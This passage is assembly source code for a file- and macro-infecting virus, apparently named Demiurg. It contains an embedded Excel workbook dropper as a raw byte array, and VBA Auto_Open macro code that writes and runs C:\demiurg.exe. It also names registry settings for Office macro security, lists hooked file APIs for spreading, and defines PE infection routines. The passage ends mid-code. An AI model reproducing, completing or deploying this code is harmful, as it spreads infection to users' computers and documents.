db 074h, 064h, 06Fh, 06Ch, 065h, 03Eh, 002h, 019h
|
|||
|
db 000h, 073h, 000h, 074h, 000h, 064h, 000h, 06Fh
|
|||
|
db 000h, 080h, 06Ch, 000h, 065h, 000h, 00Dh, 000h
|
|||
|
db 066h, 000h, 025h, 002h, 05Ch, 000h, 003h, 02Ah
|
|||
|
db 05Ch, 047h, 07Bh, 030h, 030h, 080h, 030h, 032h
|
|||
|
db 030h, 034h, 033h, 030h, 02Dh, 000h, 008h, 01Dh
|
|||
|
db 004h, 004h, 043h, 000h, 00Ah, 002h, 00Eh, 001h
|
|||
|
db 012h, 030h, 030h, 034h, 000h, 036h, 07Dh, 023h
|
|||
|
db 032h, 02Eh, 030h, 023h, 030h, 000h, 023h, 043h
|
|||
|
db 03Ah, 05Ch, 057h, 049h, 04Eh, 044h, 000h, 04Fh
|
|||
|
db 057h, 053h, 05Ch, 053h, 059h, 053h, 054h, 000h
|
|||
|
db 045h, 04Dh, 05Ch, 053h, 054h, 044h, 04Fh, 04Ch
|
|||
|
db 080h, 045h, 032h, 02Eh, 054h, 04Ch, 042h, 023h
|
|||
|
db 000h, 008h, 000h, 020h, 041h, 075h, 074h, 06Fh
|
|||
|
db 06Dh, 061h, 074h, 018h, 069h, 06Fh, 06Eh, 000h
|
|||
|
db 05Eh, 000h, 001h, 016h, 000h, 007h, 001h, 080h
|
|||
|
db 002h, 04Dh, 053h, 046h, 06Fh, 072h, 06Dh, 073h
|
|||
|
db 008h, 03Eh, 000h, 00Eh, 001h, 006h, 000h, 053h
|
|||
|
db 000h, 046h, 001h, 000h, 045h, 072h, 000h, 06Dh
|
|||
|
db 000h, 073h, 000h, 02Fh, 034h, 000h, 07Ah, 080h
|
|||
|
db 009h, 070h, 080h, 001h, 001h, 046h, 036h, 032h
|
|||
|
db 000h, 041h, 033h, 032h, 043h, 036h, 032h, 02Dh
|
|||
|
db 041h, 000h, 033h, 036h, 044h, 02Dh, 031h, 031h
|
|||
|
db 044h, 033h, 000h, 02Dh, 041h, 035h, 030h, 030h
|
|||
|
db 02Dh, 041h, 036h, 000h, 046h, 033h, 044h, 044h
|
|||
|
db 041h, 044h, 038h, 032h, 00Ch, 033h, 039h, 017h
|
|||
|
db 046h, 004h, 033h, 02Eh, 054h, 057h, 044h, 000h
|
|||
|
db 023h, 04Dh, 069h, 063h, 072h, 06Fh, 073h, 06Fh
|
|||
|
db 028h, 066h, 074h, 020h, 002h, 03Dh, 020h, 000h
|
|||
|
db 060h, 020h, 04Fh, 002h, 062h, 001h, 0B0h, 020h
|
|||
|
db 04Ch, 069h, 062h, 072h, 061h, 01Ch, 072h, 079h
|
|||
|
db 000h, 039h, 000h, 001h, 01Eh, 050h, 030h, 000h
|
|||
|
db 090h, 07Dh, 000h, 013h, 072h, 080h, 001h, 008h
|
|||
|
db 050h, 000h, 04Bh, 02Ah, 050h, 080h, 04Ah, 050h
|
|||
|
db 020h, 05Ch, 056h, 042h, 045h, 05Ch, 085h, 028h
|
|||
|
db 045h, 058h, 001h, 0A7h, 028h, 0E1h, 02Eh, 045h
|
|||
|
db 00Dh, 08Fh, 0E0h, 01Ah, 000h, 010h, 085h, 02Eh
|
|||
|
db 002h, 060h, 08Ch, 04Dh, 00Bh, 006h, 0B4h, 041h
|
|||
|
db 094h, 043h, 078h, 04Fh, 066h, 066h, 069h, 063h
|
|||
|
db 005h, 044h, 078h, 04Fh, 040h, 075h, 066h, 000h
|
|||
|
db 069h, 000h, 063h, 015h, 042h, 078h, 08Ch, 0C0h
|
|||
|
db 02Bh, 082h, 0C4h, 02Ch, 032h, 044h, 046h, 000h
|
|||
|
db 038h, 044h, 030h, 034h, 043h, 02Dh, 035h, 042h
|
|||
|
db 000h, 046h, 041h, 02Dh, 031h, 030h, 031h, 042h
|
|||
|
db 02Dh, 090h, 064h, 000h, 069h, 000h, 072h, 0E6h
|
|||
|
db 03Bh, 000h, 008h, 000h, 002h, 000h, 0E6h, 00Ch
|
|||
|
db 0FFh, 0E6h, 024h, 000h, 099h, 000h, 000h, 000h
|
|||
|
db 0CAh, 002h, 0E6h, 006h, 000h, 050h, 000h, 052h
|
|||
|
db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h
|
|||
|
db 000h, 054h, 000h, 077h, 000h, 06Dh, 0E6h, 02Fh
|
|||
|
db 000h, 014h, 000h, 002h, 000h, 0E6h, 00Ch, 0FFh
|
|||
|
db 0E6h, 024h, 000h, 0A5h, 000h, 000h, 000h, 06Bh
|
|||
|
db 0E6h, 007h, 000h, 050h, 000h, 052h, 000h, 04Fh
|
|||
|
db 000h, 04Ah, 000h, 045h, 000h, 043h, 000h, 054h
|
|||
|
db 0E6h, 033h, 000h, 010h, 000h, 002h, 001h, 003h
|
|||
|
db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0E6h
|
|||
|
db 004h, 0FFh, 0E6h, 024h, 000h, 0A7h, 000h, 000h
|
|||
|
db 000h, 0B8h, 001h, 0E6h, 006h, 000h, 005h, 000h
|
|||
|
db 053h, 000h, 075h, 000h, 06Dh, 000h, 06Dh, 000h
|
|||
|
db 061h, 000h, 072h, 000h, 079h, 000h, 049h, 000h
|
|||
|
db 06Eh, 000h, 066h, 000h, 06Fh, 000h, 072h, 000h
|
|||
|
db 06Dh, 000h, 061h, 000h, 074h, 000h, 069h, 000h
|
|||
|
db 06Fh, 000h, 06Eh, 0E6h, 01Bh, 000h, 028h, 000h
|
|||
|
db 002h, 001h, 0E6h, 004h, 0FFh, 00Ch, 000h, 000h
|
|||
|
db 000h, 0E6h, 004h, 0FFh, 0E6h, 024h, 000h, 0AEh
|
|||
|
db 000h, 000h, 000h, 0B4h, 0E6h, 007h, 000h, 042h
|
|||
|
db 044h, 045h, 035h, 040h, 078h, 041h, 041h, 040h
|
|||
|
db 077h, 00Ah, 034h, 0C0h, 002h, 032h, 008h, 055h
|
|||
|
db 050h, 052h, 04Fh, 047h, 010h, 052h, 041h, 04Dh
|
|||
|
db 04Dh, 000h, 02Bh, 049h, 043h, 052h, 000h, 04Fh
|
|||
|
db 053h, 04Fh, 046h, 054h, 020h, 04Fh, 046h, 020h
|
|||
|
db 046h, 049h, 043h, 045h, 05Ch, 084h, 001h, 04Dh
|
|||
|
db 053h, 080h, 04Fh, 039h, 037h, 02Eh, 044h, 04Ch
|
|||
|
db 04Ch, 048h, 059h, 0A1h, 083h, 022h, 020h, 038h
|
|||
|
db 02Eh, 030h, 092h, 059h, 00Fh, 042h, 0BBh, 008h
|
|||
|
db 003h, 000h, 013h, 0C2h, 001h, 0B5h, 031h, 019h
|
|||
|
db 000h, 002h, 011h, 040h, 027h, 044h, 069h, 065h
|
|||
|
db 073h, 065h, 041h, 000h, 072h, 062h, 065h, 069h
|
|||
|
db 074h, 073h, 06Dh, 061h, 010h, 070h, 070h, 065h
|
|||
|
db 01Ah, 093h, 005h, 032h, 000h, 022h, 00Bh, 041h
|
|||
|
db 00Bh, 040h, 037h, 065h, 080h, 08Ch, 065h, 000h
|
|||
|
db 041h, 000h, 0A8h, 072h, 000h, 062h, 0C0h, 039h
|
|||
|
db 069h, 040h, 0B5h, 073h, 080h, 091h, 088h, 061h
|
|||
|
db 000h, 070h, 040h, 000h, 065h, 000h, 01Ch, 040h
|
|||
|
db 009h, 028h, 000h, 000h, 048h, 042h, 001h, 031h
|
|||
|
db 0C2h, 0C6h, 01Fh, 003h, 058h, 000h, 000h, 01Eh
|
|||
|
db 042h, 002h, 001h, 005h, 02Ch, 042h, 01Fh, 0B7h
|
|||
|
db 022h, 031h, 041h, 013h, 000h, 000h, 02Bh, 0C2h
|
|||
|
db 009h, 019h, 000h, 002h, 008h, 0C0h, 001h, 054h
|
|||
|
db 061h, 062h, 065h, 06Ch, 06Ch, 088h, 065h, 031h
|
|||
|
db 01Ah, 04Ah, 003h, 032h, 000h, 010h, 0C1h, 006h
|
|||
|
db 054h, 000h, 061h, 042h, 01Bh, 06Ch, 042h, 0CFh
|
|||
|
db 031h, 064h, 019h, 0B9h, 005h, 04Ch, 019h, 007h
|
|||
|
db 020h, 009h, 044h, 065h, 06Dh, 069h, 075h, 058h
|
|||
|
db 072h, 067h, 01Ah, 082h, 062h, 084h, 001h, 032h
|
|||
|
db 082h, 062h, 044h, 055h, 0A0h, 019h, 06Dh, 0E0h
|
|||
|
db 01Bh, 075h, 020h, 01Bh, 067h, 030h, 00Ch, 0B7h
|
|||
|
db 0E3h, 0C0h, 082h, 0EDh, 018h, 0BBh, 031h, 021h
|
|||
|
db 060h, 00Ah, 0E5h, 018h, 021h, 015h, 0E6h, 039h
|
|||
|
db 000h, 044h, 069h, 065h, 073h, 065h, 041h, 072h
|
|||
|
db 062h, 065h, 069h, 074h, 073h, 06Dh, 061h, 070h
|
|||
|
db 070h, 065h, 000h, 044h, 000h, 069h, 000h, 065h
|
|||
|
db 000h, 073h, 000h, 065h, 000h, 041h, 000h, 072h
|
|||
|
db 000h, 062h, 000h, 065h, 000h, 069h, 000h, 074h
|
|||
|
db 000h, 073h, 000h, 06Dh, 000h, 061h, 000h, 070h
|
|||
|
db 000h, 070h, 000h, 065h, 000h, 000h, 000h, 054h
|
|||
|
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 000h
|
|||
|
db 054h, 000h, 061h, 000h, 062h, 000h, 065h, 000h
|
|||
|
db 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h, 000h
|
|||
|
db 000h, 000h, 044h, 065h, 06Dh, 069h, 075h, 072h
|
|||
|
db 067h, 000h, 044h, 000h, 065h, 000h, 06Dh, 000h
|
|||
|
db 069h, 000h, 075h, 000h, 072h, 000h, 067h, 0E6h
|
|||
|
db 01Ah, 000h, 049h, 044h, 03Dh, 022h, 07Bh, 044h
|
|||
|
db 039h, 045h, 034h, 036h, 045h, 046h, 030h, 02Dh
|
|||
|
db 046h, 031h, 033h, 041h, 02Dh, 031h, 031h, 044h
|
|||
|
db 033h, 02Dh, 041h, 035h, 030h, 031h, 02Dh, 041h
|
|||
|
db 036h, 046h, 033h, 044h, 044h, 041h, 044h, 038h
|
|||
|
db 032h, 033h, 039h, 07Dh, 022h, 00Dh, 00Ah, 044h
|
|||
|
db 06Fh, 063h, 075h, 06Dh, 065h, 06Eh, 074h, 03Dh
|
|||
|
db 044h, 069h, 065h, 073h, 065h, 041h, 072h, 062h
|
|||
|
db 065h, 069h, 074h, 073h, 06Dh, 061h, 070h, 070h
|
|||
|
db 065h, 02Fh, 026h, 048h, 0E6h, 008h, 030h, 00Dh
|
|||
|
db 00Ah, 044h, 06Fh, 063h, 075h, 06Dh, 065h, 06Eh
|
|||
|
db 074h, 03Dh, 054h, 061h, 062h, 065h, 06Ch, 06Ch
|
|||
|
db 065h, 031h, 02Fh, 026h, 048h, 0E6h, 008h, 030h
|
|||
|
db 00Dh, 00Ah, 04Dh, 06Fh, 064h, 075h, 06Ch, 065h
|
|||
|
db 03Dh, 044h, 065h, 06Dh, 069h, 075h, 072h, 067h
|
|||
|
db 00Dh, 00Ah, 04Eh, 061h, 06Dh, 065h, 03Dh, 022h
|
|||
|
db 056h, 042h, 041h, 050h, 072h, 06Fh, 06Ah, 065h
|
|||
|
db 063h, 074h, 022h, 00Dh, 00Ah, 048h, 065h, 06Ch
|
|||
|
db 070h, 043h, 06Fh, 06Eh, 074h, 065h, 078h, 074h
|
|||
|
db 049h, 044h, 03Dh, 022h, 030h, 022h, 00Dh, 00Ah
|
|||
|
db 043h, 04Dh, 047h, 03Dh, 022h, 039h, 039h, 039h
|
|||
|
db 042h, 039h, 038h, 039h, 038h, 039h, 043h, 039h
|
|||
|
db 038h, 039h, 043h, 039h, 038h, 039h, 043h, 039h
|
|||
|
db 038h, 039h, 043h, 022h, 00Dh, 00Ah, 044h, 050h
|
|||
|
db 042h, 03Dh, 022h, 033h, 032h, 033h, 030h, 033h
|
|||
|
db 033h, 041h, 038h, 043h, 044h, 041h, 039h, 043h
|
|||
|
db 044h, 041h, 039h, 043h, 044h, 022h, 00Dh, 00Ah
|
|||
|
db 047h, 043h, 03Dh, 022h, 043h, 042h, 043h, 039h
|
|||
|
db 043h, 041h, 035h, 033h, 036h, 032h, 035h, 034h
|
|||
|
db 036h, 032h, 035h, 034h, 039h, 044h, 022h, 00Dh
|
|||
|
db 00Ah, 00Dh, 00Ah, 05Bh, 048h, 06Fh, 073h, 074h
|
|||
|
db 020h, 045h, 078h, 074h, 065h, 06Eh, 064h, 065h
|
|||
|
db 072h, 020h, 049h, 06Eh, 066h, 06Fh, 05Dh, 00Dh
|
|||
|
db 00Ah, 026h, 048h, 0E6h, 007h, 030h, 031h, 03Dh
|
|||
|
db 07Bh, 033h, 038h, 033h, 032h, 044h, 036h, 034h
|
|||
|
db 030h, 02Dh, 043h, 046h, 039h, 030h, 02Dh, 031h
|
|||
|
db 031h, 043h, 046h, 02Dh, 038h, 045h, 034h, 033h
|
|||
|
db 02Dh, 030h, 030h, 041h, 030h, 043h, 039h, 031h
|
|||
|
db 031h, 030h, 030h, 035h, 041h, 07Dh, 03Bh, 056h
|
|||
|
db 042h, 045h, 03Bh, 026h, 048h, 0E6h, 008h, 030h
|
|||
|
db 00Dh, 00Ah, 00Dh, 00Ah, 05Bh, 057h, 06Fh, 072h
|
|||
|
db 06Bh, 073h, 070h, 061h, 063h, 065h, 05Dh, 00Dh
|
|||
|
db 00Ah, 044h, 069h, 065h, 073h, 065h, 041h, 072h
|
|||
|
db 062h, 065h, 069h, 074h, 073h, 06Dh, 061h, 070h
|
|||
|
db 070h, 065h, 03Dh, 030h, 02Ch, 020h, 030h, 02Ch
|
|||
|
db 020h, 030h, 02Ch, 020h, 030h, 02Ch, 020h, 043h
|
|||
|
db 00Dh, 00Ah, 054h, 061h, 062h, 065h, 06Ch, 06Ch
|
|||
|
db 065h, 031h, 03Dh, 030h, 02Ch, 020h, 030h, 02Ch
|
|||
|
db 020h, 030h, 02Ch, 020h, 030h, 02Ch, 020h, 043h
|
|||
|
db 00Dh, 00Ah, 044h, 065h, 06Dh, 069h, 075h, 072h
|
|||
|
db 067h, 03Dh, 032h, 032h, 02Ch, 020h, 032h, 032h
|
|||
|
db 02Ch, 020h, 034h, 030h, 036h, 02Ch, 020h, 031h
|
|||
|
db 039h, 031h, 02Ch, 020h, 05Ah, 00Dh, 00Ah, 0E6h
|
|||
|
db 008h, 000h, 0FEh, 0FFh, 000h, 000h, 004h, 000h
|
|||
|
db 002h, 0E6h, 011h, 000h, 001h, 000h, 000h, 000h
|
|||
|
db 0E0h, 085h, 09Fh, 0F2h, 0F9h, 04Fh, 068h, 010h
|
|||
|
db 0ABh, 091h, 008h, 000h, 02Bh, 027h, 0B3h, 0D9h
|
|||
|
db 030h, 000h, 000h, 000h, 084h, 000h, 000h, 000h
|
|||
|
db 006h, 000h, 000h, 000h, 001h, 000h, 000h, 000h
|
|||
|
db 038h, 000h, 000h, 000h, 004h, 000h, 000h, 000h
|
|||
|
db 040h, 000h, 000h, 000h, 008h, 000h, 000h, 000h
|
|||
|
db 04Ch, 000h, 000h, 000h, 012h, 000h, 000h, 000h
|
|||
|
db 058h, 000h, 000h, 000h, 00Ch, 000h, 000h, 000h
|
|||
|
db 070h, 000h, 000h, 000h, 013h, 000h, 000h, 000h
|
|||
|
db 07Ch, 000h, 000h, 000h, 002h, 000h, 000h, 000h
|
|||
|
db 0E4h, 004h, 000h, 000h, 01Eh, 000h, 000h, 000h
|
|||
|
db 002h, 000h, 000h, 000h, 042h, 000h, 073h, 000h
|
|||
|
db 01Eh, 000h, 000h, 000h, 002h, 000h, 000h, 000h
|
|||
|
db 042h, 000h, 073h, 000h, 01Eh, 000h, 000h, 000h
|
|||
|
db 010h, 000h, 000h, 000h, 04Dh, 069h, 063h, 072h
|
|||
|
db 06Fh, 073h, 06Fh, 066h, 074h, 020h, 045h, 078h
|
|||
|
db 063h, 065h, 06Ch, 000h, 040h, 000h, 000h, 000h
|
|||
|
db 080h, 0ECh, 0E8h, 033h, 03Fh, 085h, 0BFh, 001h
|
|||
|
db 003h, 0E6h, 013h, 000h, 0FEh, 0FFh, 000h, 000h
|
|||
|
db 004h, 000h, 002h, 0E6h, 011h, 000h, 002h, 000h
|
|||
|
db 000h, 000h, 002h, 0D5h, 0CDh, 0D5h, 09Ch, 02Eh
|
|||
|
db 01Bh, 010h, 093h, 097h, 008h, 000h, 02Bh, 02Ch
|
|||
|
db 0F9h, 0AEh, 044h, 000h, 000h, 000h, 005h, 0D5h
|
|||
|
db 0CDh, 0D5h, 09Ch, 02Eh, 01Bh, 010h, 093h, 097h
|
|||
|
db 008h, 000h, 02Bh, 02Ch, 0F9h, 0AEh, 008h, 001h
|
|||
|
db 000h, 000h, 0C4h, 000h, 000h, 000h, 009h, 000h
|
|||
|
db 000h, 000h, 001h, 000h, 000h, 000h, 050h, 000h
|
|||
|
db 000h, 000h, 00Fh, 000h, 000h, 000h, 058h, 000h
|
|||
|
db 000h, 000h, 017h, 000h, 000h, 000h, 064h, 000h
|
|||
|
db 000h, 000h, 00Bh, 000h, 000h, 000h, 06Ch, 000h
|
|||
|
db 000h, 000h, 010h, 000h, 000h, 000h, 074h, 000h
|
|||
|
db 000h, 000h, 013h, 000h, 000h, 000h, 07Ch, 000h
|
|||
|
db 000h, 000h, 016h, 000h, 000h, 000h, 084h, 000h
|
|||
|
db 000h, 000h, 00Dh, 000h, 000h, 000h, 08Ch, 000h
|
|||
|
db 000h, 000h, 00Ch, 000h, 000h, 000h, 0A1h, 000h
|
|||
|
db 000h, 000h, 002h, 000h, 000h, 000h, 0E4h, 004h
|
|||
|
db 000h, 000h, 01Eh, 000h, 000h, 000h, 001h, 0E6h
|
|||
|
db 005h, 000h, 06Ch, 000h, 003h, 000h, 000h, 000h
|
|||
|
db 06Ah, 010h, 008h, 000h, 00Bh, 0E6h, 007h, 000h
|
|||
|
db 00Bh, 0E6h, 007h, 000h, 00Bh, 0E6h, 007h, 000h
|
|||
|
db 00Bh, 0E6h, 007h, 000h, 01Eh, 010h, 000h, 000h
|
|||
|
db 001h, 000h, 000h, 000h, 009h, 000h, 000h, 000h
|
|||
|
db 054h, 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h
|
|||
|
db 000h, 00Ch, 010h, 000h, 000h, 002h, 000h, 000h
|
|||
|
db 000h, 01Eh, 000h, 000h, 000h, 009h, 000h, 000h
|
|||
|
db 000h, 054h, 061h, 062h, 065h, 06Ch, 06Ch, 065h
|
|||
|
db 06Eh, 000h, 003h, 000h, 000h, 000h, 001h, 0E6h
|
|||
|
db 005h, 000h, 098h, 000h, 000h, 000h, 003h, 0E6h
|
|||
|
db 007h, 000h, 020h, 000h, 000h, 000h, 001h, 000h
|
|||
|
db 000h, 000h, 036h, 000h, 000h, 000h, 002h, 000h
|
|||
|
db 000h, 000h, 03Eh, 000h, 000h, 000h, 001h, 000h
|
|||
|
db 000h, 000h, 002h, 000h, 000h, 000h, 00Ah, 000h
|
|||
|
db 000h, 000h, 05Fh, 050h, 049h, 044h, 05Fh, 047h
|
|||
|
db 055h, 049h, 044h, 000h, 002h, 000h, 000h, 000h
|
|||
|
db 0E4h, 004h, 000h, 000h, 041h, 000h, 000h, 000h
|
|||
|
db 04Eh, 000h, 000h, 000h, 07Bh, 000h, 044h, 000h
|
|||
|
db 039h, 000h, 045h, 000h, 034h, 000h, 036h, 000h
|
|||
|
db 045h, 000h, 046h, 000h, 031h, 000h, 02Dh, 000h
|
|||
|
db 046h, 000h, 031h, 000h, 033h, 000h, 041h, 000h
|
|||
|
db 02Dh, 000h, 031h, 000h, 031h, 000h, 044h, 000h
|
|||
|
db 033h, 000h, 02Dh, 000h, 041h, 000h, 035h, 000h
|
|||
|
db 030h, 000h, 031h, 000h, 02Dh, 000h, 041h, 000h
|
|||
|
db 036h, 000h, 046h, 000h, 033h, 000h, 044h, 000h
|
|||
|
db 044h, 000h, 041h, 000h, 044h, 000h, 038h, 000h
|
|||
|
db 032h, 000h, 033h, 000h, 039h, 000h, 07Dh, 0E6h
|
|||
|
db 027h, 000h, 005h, 000h, 044h, 000h, 06Fh, 000h
|
|||
|
db 063h, 000h, 075h, 000h, 06Dh, 000h, 065h, 000h
|
|||
|
db 06Eh, 000h, 074h, 000h, 053h, 000h, 075h, 000h
|
|||
|
db 06Dh, 000h, 06Dh, 000h, 061h, 000h, 072h, 000h
|
|||
|
db 079h, 000h, 049h, 000h, 06Eh, 000h, 066h, 000h
|
|||
|
db 06Fh, 000h, 072h, 000h, 06Dh, 000h, 061h, 000h
|
|||
|
db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h
|
|||
|
db 00Bh, 000h, 038h, 000h, 002h, 000h, 0E6h, 00Ch
|
|||
|
db 0FFh, 0E6h, 024h, 000h, 0B1h, 000h, 000h, 000h
|
|||
|
db 0A0h, 001h, 0E6h, 006h, 000h, 001h, 000h, 043h
|
|||
|
db 000h, 06Fh, 000h, 06Dh, 000h, 070h, 000h, 04Fh
|
|||
|
db 000h, 062h, 000h, 06Ah, 0E6h, 031h, 000h, 012h
|
|||
|
db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h
|
|||
|
db 000h, 0B8h, 000h, 000h, 000h, 068h, 0E6h, 04Bh
|
|||
|
db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 074h, 000h, 0E6h
|
|||
|
db 00Ch, 0FFh, 0E6h, 030h, 000h, 001h, 000h, 0FEh
|
|||
|
db 0FFh, 003h, 00Ah, 000h, 000h, 0E6h, 004h, 0FFh
|
|||
|
db 020h, 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h
|
|||
|
db 006h, 000h, 046h, 01Ch, 000h, 000h, 000h, 04Dh
|
|||
|
db 069h, 063h, 072h, 06Fh, 073h, 06Fh, 066h, 074h
|
|||
|
db 020h, 045h, 078h, 063h, 065h, 06Ch, 020h, 038h
|
|||
|
db 02Eh, 030h, 02Dh, 054h, 061h, 062h, 065h, 06Ch
|
|||
|
db 06Ch, 065h, 000h, 006h, 000h, 000h, 000h, 042h
|
|||
|
db 069h, 066h, 066h, 038h, 000h, 00Eh, 000h, 000h
|
|||
|
db 000h, 045h, 078h, 063h, 065h, 06Ch, 02Eh, 053h
|
|||
|
db 068h, 065h, 065h, 074h, 02Eh, 038h, 000h, 0F4h
|
|||
|
db 039h, 0B2h, 071h, 0E6h, 0FFh, 000h, 0E6h, 0A5h
|
|||
|
db 000h
|
|||
|
macro_dropper_size EQU ($ - macro_dropper)
|
|||
|
|
|||
|
; ----- macro code ----------------------------------------------------------
|
|||
|
;
|
|||
|
; This is the macro code that will be stored in infected .xls files. It drops
|
|||
|
; the PE EXE dropper as C:\demiurg.exe and executes it. This code is
|
|||
|
; incomplete, the data of the dropper will be converted to VBA Array
|
|||
|
; instructions at the time Excel is infected, and the full VBA code will be
|
|||
|
; stored in the file C:\demiurg.sys then; this is the file that will be used
|
|||
|
; to infect .xls files by the dropper
|
|||
|
|
|||
|
main_macro_code:
|
|||
|
db "Attribute VB_Name = ""Demiurg""", 0Dh, 0Ah
|
|||
|
db "Public a", 0Dh, 0Ah
|
|||
|
db "Sub Auto_Open()", 0Dh, 0Ah
|
|||
|
db "Open ""C:\demiurg.exe"" For Binary As #1", 0Dh, 0Ah
|
|||
|
db "b", 0Dh, 0Ah
|
|||
|
db "c", 0Dh, 0Ah
|
|||
|
db "d", 0Dh, 0Ah
|
|||
|
db "e", 0Dh, 0Ah
|
|||
|
db "f", 0Dh, 0Ah
|
|||
|
db "g", 0Dh, 0Ah
|
|||
|
db "Close #1", 0Dh, 0Ah
|
|||
|
db "t=Shell(""C:\demiurg.exe"",vbNormalFocus)", 0Dh, 0Ah
|
|||
|
db "End Sub", 0Dh, 0Ah
|
|||
|
db "Sub w()", 0Dh, 0Ah
|
|||
|
db "For i=0 To 127", 0Dh, 0Ah
|
|||
|
db "v$=Chr$(a(i))", 0Dh, 0Ah
|
|||
|
db "Put #1,,v$", 0Dh, 0Ah
|
|||
|
db "Next", 0Dh, 0Ah
|
|||
|
end_sub:
|
|||
|
db "End Sub", 0Dh, 0Ah
|
|||
|
main_macro_code_size EQU ($ - main_macro_code)
|
|||
|
|
|||
|
sub_header:
|
|||
|
sub_name EQU byte ptr ($ + 4)
|
|||
|
db "Sub b()", 0Dh, 0Ah
|
|||
|
|
|||
|
regkey db "Software\Microsoft\Office\8.0\Excel", 0
|
|||
|
office_version_number EQU byte ptr (offset regkey+26)
|
|||
|
subkey_97 db "Microsoft Excel", 0
|
|||
|
subkey_2K db "Security", 0
|
|||
|
subkey_InstallRoot db "InstallRoot", 0
|
|||
|
regvalue_options db "Options6", 0
|
|||
|
regvalue_2K db "Level", 0
|
|||
|
regvalue_path db "Path", 0
|
|||
|
|
|||
|
demiurg_xls db "\xlstart\demiurg.xls", 0
|
|||
|
macro_filename db "C:\demiurg.sys", 0
|
|||
|
kernel32_dll db "\kernel32.dll", 0
|
|||
|
|
|||
|
path_buffer1 db 260 dup(?)
|
|||
|
path_buffer2 db 260 dup(?)
|
|||
|
size_buffer dd 260
|
|||
|
REG_SZ dd 1
|
|||
|
regvalue_dword dd 0
|
|||
|
reg_handle1 dd ?
|
|||
|
reg_handle2 dd ?
|
|||
|
|
|||
|
dos_exe_size dd ?
|
|||
|
resource_table dd ?
|
|||
|
heap_buffer dd ?
|
|||
|
dummy_dword dd ?
|
|||
|
|
|||
|
filename_ofs dd ?
|
|||
|
attributes dd ?
|
|||
|
CreationTime dq ?
|
|||
|
LastAccessTime dq ?
|
|||
|
LastWriteTime dq ?
|
|||
|
filesize dd ?
|
|||
|
filehandle dd ?
|
|||
|
maphandle dd ?
|
|||
|
mapbase dd ?
|
|||
|
virus_RVA dd ?
|
|||
|
virus_start dd ?
|
|||
|
|
|||
|
kernel32 dd 0
|
|||
|
kernel32name db "KERNEL32", 0
|
|||
|
GetModuleHandleA db "GetModuleHandleA", 0
|
|||
|
l_GMH EQU $ - offset GetModuleHandleA
|
|||
|
|
|||
|
kernel32_API_names_table:
|
|||
|
n_GlobalAlloc db "GlobalAlloc", 0
|
|||
|
n_GlobalFree db "GlobalFree", 0
|
|||
|
n_GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
|
|||
|
n_GetSystemDirectoryA db "GetSystemDirectoryA", 0
|
|||
|
n_lstrcatA db "lstrcatA", 0
|
|||
|
n_LoadLibraryA db "LoadLibraryA", 0
|
|||
|
n_CloseHandle db "CloseHandle", 0
|
|||
|
n_GetFileSize db "GetFileSize", 0
|
|||
|
n_GetFileTime db "GetFileTime", 0
|
|||
|
n_SetFileTime db "SetFileTime", 0
|
|||
|
n_SetEndOfFile db "SetEndOfFile", 0
|
|||
|
n_SetFilePointer db "SetFilePointer", 0
|
|||
|
n_CreateFileMappingA db "CreateFileMappingA", 0
|
|||
|
n_MapViewOfFile db "MapViewOfFile", 0
|
|||
|
n_UnmapViewOfFile db "UnmapViewOfFile", 0
|
|||
|
n_WideCharToMultiByte db "WideCharToMultiByte", 0
|
|||
|
|
|||
|
; names of APIs that are both used and hooked
|
|||
|
hooked_API_names_table:
|
|||
|
n_CreateFileA db "CreateFileA", 0
|
|||
|
n_GetFileAttributesA db "GetFileAttributesA", 0
|
|||
|
n_SetFileAttributesA db "SetFileAttributesA", 0
|
|||
|
n_CopyFileA db "CopyFileA", 0
|
|||
|
n_MoveFileExA db "MoveFileExA", 0
|
|||
|
|
|||
|
; names of APIs that are only hooked and not used
|
|||
|
n_MoveFileA db "MoveFileA", 0
|
|||
|
n__lopen db "_lopen", 0
|
|||
|
|
|||
|
number_of_hooked_APIs EQU 7
|
|||
|
|
|||
|
kernel32_API_address_table:
|
|||
|
GlobalAlloc dd ?
|
|||
|
GlobalFree dd ?
|
|||
|
GetWindowsDirectoryA dd ?
|
|||
|
GetSystemDirectoryA dd ?
|
|||
|
lstrcatA dd ?
|
|||
|
LoadLibraryA dd ?
|
|||
|
CloseHandle dd ?
|
|||
|
GetFileSize dd ?
|
|||
|
GetFileTime dd ?
|
|||
|
SetFileTime dd ?
|
|||
|
SetEndOfFile dd ?
|
|||
|
SetFilePointer dd ?
|
|||
|
CreateFileMappingA dd ?
|
|||
|
MapViewOfFile dd ?
|
|||
|
UnmapViewOfFile dd ?
|
|||
|
WideCharToMultiByte dd ?
|
|||
|
CreateFileA dd ?
|
|||
|
GetFileAttributesA dd ?
|
|||
|
SetFileAttributesA dd ?
|
|||
|
CopyFileA dd ?
|
|||
|
MoveFileExA dd ?
|
|||
|
number_of_kernel32_APIs EQU (($ - kernel32_API_address_table) / 4)
|
|||
|
|
|||
|
advapi32_dll db "ADVAPI32.dll", 0
|
|||
|
advapi32_API_names_table:
|
|||
|
n_RegOpenKeyExA db "RegOpenKeyExA", 0
|
|||
|
n_RegCreateKeyExA db "RegCreateKeyExA", 0
|
|||
|
n_RegQueryValueExA db "RegQueryValueExA", 0
|
|||
|
n_RegSetValueExA db "RegSetValueExA", 0
|
|||
|
n_RegCloseKey db "RegCloseKey", 0
|
|||
|
|
|||
|
advapi32_API_address_table:
|
|||
|
RegOpenKeyExA dd ?
|
|||
|
RegCreateKeyExA dd ?
|
|||
|
RegQueryValueExA dd ?
|
|||
|
RegSetValueExA dd ?
|
|||
|
RegCloseKey dd ?
|
|||
|
number_of_advapi32_APIs EQU (($ - advapi32_API_address_table) / 4)
|
|||
|
|
|||
|
imagehlp_dll db "IMAGEHLP.dll", 0
|
|||
|
CheckSumMappedFile db "CheckSumMappedFile", 0
|
|||
|
|
|||
|
virus_end:
|
|||
|
|
|||
|
|
|||
|
.code
|
|||
|
dummy_host:
|
|||
|
push 0
|
|||
|
push offset caption
|
|||
|
push offset message
|
|||
|
push 0
|
